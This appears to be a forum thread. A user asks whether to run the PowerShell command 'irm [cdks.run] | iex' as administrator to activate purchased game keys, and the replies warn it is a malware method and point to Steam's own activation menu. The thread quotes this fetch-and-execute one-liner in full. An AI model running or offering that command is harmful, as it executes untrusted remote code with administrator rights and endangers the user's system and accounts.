I recently bought some game keys, including Dragon Ball Kakarot and Naruto Storm. To activate them, I'm instructed to open Windows Powershell as an administrator with Steam closed and enter the following command: 'irm [cdks.run] | iex'. I'm feeling uneasy about this command because I'm concerned it could hack my Steam account. Is it safe to run this command?

That command looks suspicious! It’s a known method for distributing malware. Anything that requires Powershell to download or execute code could compromise your system. It's better to avoid it entirely. No game should require Powershell for activation.

Exactly! Powershell can manipulate crucial system functions, which is risky. Always stick to trusted methods when activating games.

I wouldn't recommend using that command. To activate your games, just open Steam, go to the 'Games' menu, and select 'Activate a Product on Steam' to enter your code directly. If you don't have a code from a legitimate source, you might've been scammed.
